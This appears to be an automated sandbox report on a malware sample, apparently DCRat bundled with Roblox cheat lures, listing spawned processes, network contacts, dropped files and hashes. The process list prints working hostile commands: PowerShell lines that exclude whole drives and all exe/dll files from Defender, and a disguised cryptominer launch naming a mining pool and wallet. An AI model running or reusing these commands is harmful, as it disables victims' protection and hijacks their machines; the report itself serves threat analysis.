C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ZCBMNmhnaO.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet\ComContainerbrowserRefRuntime.exe"

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5tk1CddJ7G.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\fontdrvhost.exe

"C:\Users\Admin\AppData\Local\fontdrvhost.exe"

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet\ComContainerbrowserRefRuntime.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D401E69C13BB41A3D6E2E185386A0405 E Global\MSI0000

C:\Windows\SysWOW64\wevtutil.exe

"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man"

C:\Windows\System32\wevtutil.exe

"wevtutil.exe" im "C:\Program Files\nodejs\node_etw_provider.man" /fromwow64

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa38bd855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.nodejs.org udp
US 104.20.23.46:443 www.nodejs.org tcp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.22.46:443 nodejs.org tcp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 46.22.20.104.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 729231cm.n9shteam1.top udp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
FI 77.105.133.52:80 729231cm.n9shteam1.top tcp
US 8.8.8.8:53 52.133.105.77.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 ozero.top udp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 papka.top udp
US 172.67.169.72:80 papka.top tcp
FI 77.105.133.52:80 ozero.top tcp
US 8.8.8.8:53 72.169.67.172.in-addr.arpa udp
FI 77.105.133.52:80 ozero.top tcp
US 172.67.169.72:80 papka.top tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 66.229.138.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Youtube.exe

C:\Users\Admin\AppData\Local\Temp\Solara.exe

C:\Users\Admin\AppData\Local\Temp\Result.exe

C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

C:\Users\Admin\AppData\Local\Temp\Solara.exe

C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

C:\Users\Admin\AppData\Local\Temp\Frage build.exe

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe

C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

C:\winNet\we9fgyC144zVOkGk.vbe

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ixj4ntk.moe.ps1

C:\Windows\Installer\MSIB093.tmp

C:\Windows\Installer\MSIB20C.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Windows\Installer\MSICB91.tmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cae60f0ddddac635da71bba775a2c5b4
SHA1 386f1a036af61345a7d303d45f5230e2df817477
SHA256 b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA512 28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat

MD5 81c6a00913630266cef3d07065db9b1f
SHA1 db6260ef38563ec05f910277af358fbaa2387154
SHA256 5898912e30972853e1b8ee628e9c300f25c5959d11e6b91b6454ddc19e328cf4
SHA512 a643512ca118e8745ae8aafb010bb21099ba0a358eb8a951471cc5092e14c51ffafae0c288d84ddcda5eaad2a3e93b30ecd205bfe0938a21f05e6c87ead3cb36

memory/3228-306-0x000000001D8A0000-0x000000001DA62000-memory.dmp

C:\winNet\ComContainerbrowserRefRuntime.exe

MD5 e41ef428aaa4841f258a38dc1cc305ef
SHA1 edf3a17831e013b74479e2e635b8cf0c1b3787ce
SHA256 6c02076f8f42678e0576a71ff170ed84b203a0e5e9a31bda9aed912822f25995
SHA512 a92a30077601aaf34a05ceaab5738ad2aa585498868bb6b675dd43d332c46424c859ed19cf0159b04fcf7b4da3b773e37ca064e8975a43964cc6a654661f46bd

memory/5336-310-0x0000000000BF0000-0x0000000000D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oensqgEQyM.bat

MD5 293d9566fdf946163a7c10e0e9941af7
SHA1 ed32a62f79ce8dbc1586b5bf0721e3607b16a507
SHA256 e81692b039e1c113d0f4c71f9a04ca597cfe8c82da961bfae9440aac9366b189
SHA512 6b42e832adc4bac6d0909ce14e4fed6a18603ed9df7ecc53da9854e64f49281aee5af53076ef80f021551a0cdb5067cfaca276922967c247577785195ea6b891

memory/3228-328-0x000000001E2A0000-0x000000001E7C8000-memory.dmp

C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat

MD5 1689f0727433844f3250241e9e030427
SHA1 bac7909c2a8e7a666edb56a7df07650701d9c013
SHA256 fa50cc35b05b88a91212dba6ca7cb348368309e9fdfa16273d1adc659f42cdab
SHA512 d814a8015dcce43a0128c7a5c34998a9a7df03231c5c2b1df169e8986de6e8ec1e77692756ada79f8355abaa50c35ccf5d5f2eaa13c76e02a4dd582ce9c51528

C:\DriversavessessionDlldhcp\Roblox.exe

MD5 26e388ea32df635cd424decb2bff563e
SHA1 510ac8024dd524f7ebc92210b189804921fd29ee
SHA256 cf90b0e7318a9e4e3cbaeebd3f82f823e7754a35e689979fabd18e785383dc8e
SHA512 b59ecb856064e3d590ec3d0f17410195bf08cd6a2b0bb091c92c9200c3e163f5b0e918b09f7ff0f51990dae49ba27ea566862353647ee59ae9ea9c192faf79d1

memory/1176-333-0x0000000000280000-0x000000000045A000-memory.dmp

memory/1176-335-0x00000000023E0000-0x00000000023EE000-memory.dmp

memory/1176-337-0x000000001AFB0000-0x000000001AFCC000-memory.dmp

memory/1176-339-0x000000001AFD0000-0x000000001AFE8000-memory.dmp

memory/1176-341-0x0000000002500000-0x000000000250C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\fndgbpbq\fndgbpbq.cmdline

MD5 7320e1e4d0afd9c785757030cc3aa7ea
SHA1 2b77e248314315e8d2007c4c04e4f83eca66b392
SHA256 dab9aa32e5a0d0c7431dfd281d57ff37c57a254ab819e2a8feef4be09b5bcdfe
SHA512 987a3db351363522861c00dc6f55f1a15df3159fbd49ed73ab530003f2f22f22d10e2135b4a40ffdf9b6667c20682a6eb767aace1d70c022c4e15d72d339007a

\??\c:\Users\Admin\AppData\Local\Temp\fndgbpbq\fndgbpbq.0.cs

MD5 a58a757ecfe01384d231971348228f8f
SHA1 fa459abb3d37031460e19a603fa092d6d91a0c4c
SHA256 5a4978dc4e8682b26a68c5563dbd73d34f10545b9129aa242b9c705f804f861a
SHA512 f68f9f5da60b42ee16f10d307d9a9de6b168b2b54d8dea519f016be3112adeaf1cb40522306fc18cfa9a339169e5820f39334f266f5183ad9ab9c1a1fa49a94a

\??\c:\Windows\Globalization\CSC2CD0480A80E4347B591AF5A63AD67F8.TMP

MD5 70ebd87a449c83d0645ba22e10ab83e5
SHA1 5980251d5a46d81e6f48fe53ee04e87a28219015
SHA256 b4713f585dbd4185833afeb466a2fbaa5c9d17071f9de2a1f0dfeec01b346c01
SHA512 b44a0154a6c4b1f2af61046a0357b8018a5095262f0ec54e701f4bd46adcaad3e88bafe23567e49b845bd83578d0291bcff6a43351d6027ea02c9e1ead96ca66

C:\Users\Admin\AppData\Local\Temp\RESEB69.tmp

MD5 1b8397189f6a495740655f00fe70ffb8
SHA1 4953646f2a39b1f5dc088fb2d68b59cbcbd5ebd2
SHA256 5dbbfddca1bb3bd3128eaeeb746151145129a9d8be86ce0e681e36fca62d08ca
SHA512 06ba2e6d2c64d0b000a36abe0bb987ca4846bb55b5a7ea6a0a53f0ae86f33f7c4d181e09fbcf089438b95526054a635ad52e18e51a430aaed8484af04ce80a7d

\??\c:\Users\Admin\AppData\Local\Temp\gajwrdcm\gajwrdcm.0.cs

MD5 d35e54f45eb5995d6740cdd271394369
SHA1 3d76192df2fdde62f2e6ef5ffd62ab96faa5b163
SHA256 d1edfd6c2a97f287404719baf709427165bfd53a9ed50815c54559b5f9e70069
SHA512 20efe17b8953b13ff8f66e330740c0d3ea9018cc90fcbbe90b826103bad23824f26549d2c0b56279b210175728200790049e4025e6f45da599138351389a1e90

\??\c:\Users\Admin\AppData\Local\Temp\gajwrdcm\gajwrdcm.cmdline

MD5 2310f0d098d541a2d921edf287fffca3
SHA1 9970817de75b46dc6b0864c6f78660832a69a086
SHA256 b3a835533f7554d4c335a13bb4d7baefcd62f070d1bff85f98a5c3aefe8f5f91
SHA512 d0281ef387500808b6f55f93b0c93498d2e46a8624a7029d34dc63e45372525d6295dab695dd9a8915c8a0b51eec4831fd458615cc7449997f794af05fe1d734

\??\c:\Program Files (x86)\Internet Explorer\en-US\CSC303836A264394C678FCD25C781BA961.TMP

MD5 780929fe2feb53fb270143ab0691854b
SHA1 be3e8b5c1d5a2897e95e7d00420b738c3bc311b4
SHA256 1367fb29f1eed5f5360fc57d0f73955ab54997791757fde595e53df3df43dac7
SHA512 7c30065be290afb2351786dd8900fd128dd822592d8c73959f0eb1ee633fef3e140f7ed5b54b16c747d7410b3486bc798136224b5ad923bad4fdf491e97ee272

C:\Users\Admin\AppData\Local\Temp\RESEC06.tmp

MD5 a4c1dd24cedc4327d3a40aacc69b0867
SHA1 2266040aa46ccab274037ed6c5d8666b00757e3c
SHA256 fa6bbdd2fd1e5c069588c19769018ed268e0d034d60dfa4611ad8e2fe8e77873
SHA512 5ddd9caaae329a5f861251779540164b4f98bf648f0a5d593dc68fbb635a16cfb33c69f2b0d8525ec823571f3690d5e8c455f9fd766801c599bdd2988e0122f5

\??\c:\Users\Admin\AppData\Local\Temp\xxy4xula\xxy4xula.cmdline

MD5 20715e86c94c5130e3fa4dd4e1bed37f
SHA1 b9d7f52a38ec5010d64ae62bfa2ca2b7c66a15c3
SHA256 4deab6e626076fb95208bc07549b85ba6b016dc0640ea5b5edb9f22acf47c4fe
SHA512 7ee2e254ad01207e2d7573c437bfb13061669164c0fe3cdaf7fdebadd22135892e05e4626802c5f278c01a90159c0ffe6104338bc46f1ecaba794daaf349d182

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 c1a4a4340b4aaf6b72487d4d011fdee9
SHA1 c1a25eeeb340d226fa996fd8b6e9559d3112b4c5
SHA256 858259d792411041f71a344c219b120bd494de51529259dac6846ae8e7e9bc19
SHA512 76316cb27ac8729ab8f972229c25e521213295c2a6b21b073cb9b258b056e85facd86754abbf1a7e89b7516a1a184b6826a078ddb56f4c9bb2de5c3844929f37

memory/4764-674-0x0000000002800000-0x0000000002820000-memory.dmp

memory/4764-669-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-673-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-683-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-687-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-685-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-684-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-686-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

MD5 b020de8f88eacc104c21d6e6cacc636d
SHA1 20b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA256 3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA512 4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

MD5 d2cf52aa43e18fdc87562d4c1303f46a
SHA1 58fb4a65fffb438630351e7cafd322579817e5e1
SHA256 45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA512 54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

MD5 7428aa9f83c500c4a434f8848ee23851
SHA1 166b3e1c1b7d7cb7b070108876492529f546219f
SHA256 1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7
SHA512 c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

MD5 5ad87d95c13094fa67f25442ff521efd
SHA1 01f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA256 67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA512 7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

MD5 d7c8fab641cd22d2cd30d2999cc77040
SHA1 d293601583b1454ad5415260e4378217d569538e
SHA256 04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be
SHA512 278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

MD5 bc0c0eeede037aa152345ab1f9774e92
SHA1 56e0f71900f0ef8294e46757ec14c0c11ed31d4e
SHA256 7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5
SHA512 5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

MD5 f0bd53316e08991d94586331f9c11d97
SHA1 f5a7a6dc0da46c3e077764cfb3e928c4a75d383e
SHA256 dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef
SHA512 fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

MD5 072ac9ab0c4667f8f876becedfe10ee0
SHA1 0227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA256 2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512 f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

MD5 2916d8b51a5cc0a350d64389bc07aef6
SHA1 c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256 733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512 508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

MD5 d116a360376e31950428ed26eae9ffd4
SHA1 192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b
SHA256 c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5
SHA512 5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

MD5 1d7c74bcd1904d125f6aff37749dc069
SHA1 21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab
SHA256 24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9
SHA512 b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

memory/7160-2436-0x000001D41D350000-0x000001D41D356000-memory.dmp

memory/7160-2439-0x000001D41D6B0000-0x000001D41D6B6000-memory.dmp

C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

MD5 e9dc66f98e5f7ff720bf603fff36ebc5
SHA1 f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b
SHA256 b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79
SHA512 8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

C:\Program Files\nodejs\node_etw_provider.man

MD5 d3bc164e23e694c644e0b1ce3e3f9910
SHA1 1849f8b1326111b5d4d93febc2bafb3856e601bb
SHA256 1185aaa5af804c6bc6925f5202e68bb2254016509847cd382a015907440d86b4
SHA512 91ebff613f4c35c625bb9b450726167fb77b035666ed635acf75ca992c4846d952655a2513b4ecb8ca6f19640d57555f2a4af3538b676c3bd2ea1094c4992854

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

MD5 35b86e177ab52108bd9fed7425a9e34a
SHA1 76a1f47a10e3ab829f676838147875d75022c70c
SHA256 afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA512 3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

MD5 db7dbbc86e432573e54dedbcc02cb4a1
SHA1 cff9cfb98cff2d86b35dc680b405e8036bbbda47
SHA256 7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9
SHA512 8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

C:\Config.Msi\e57ab18.rbs

MD5 bb61161e3c56f97a0000a5886f638371
SHA1 b705c1b21f083a12af28e812abaca583e4820c4f
SHA256 206f38f63300efcd5df1e067ef451ed660b1f629dd86248280663851134e9700
SHA512 20aa01c0c6598a7da5afbc7026b4ff2b8682627f8da3373271405a094f1800521b20e546da224ec2d4e63d3b90b40408f25f871e2a0d42378fbec34ce618b3a5

C:\Users\Admin\AppData\Local\Temp\giPXNxELJZ

MD5 a603e09d617fea7517059b4924b1df93
SHA1 31d66e1496e0229c6a312f8be05da3f813b3fa9e
SHA256 ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7
SHA512 eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

C:\Users\Admin\AppData\Local\Temp\YA3l3xUIWB

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\S5uLH4IzQp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\6YRq7pmyBz

MD5 93033b50faaecfc1f3413dd113d4f365
SHA1 a04840585ab5160bad05c13aabe2a875416b0d79
SHA256 51ac570ca79b6f12f89240532e24cf26a9cab7e982b6570e54b10769c6f60e25
SHA512 986351814483f2072bf4b83a5bcd221be88f888f90f85ce588807e354b9716e96e0f238735740b6217bfd28ffc75eedeabb2d56d1a10a384ced5501b346611ce

memory/4764-3029-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4764-3032-0x0000000140000000-0x0000000140786000-memory.dmp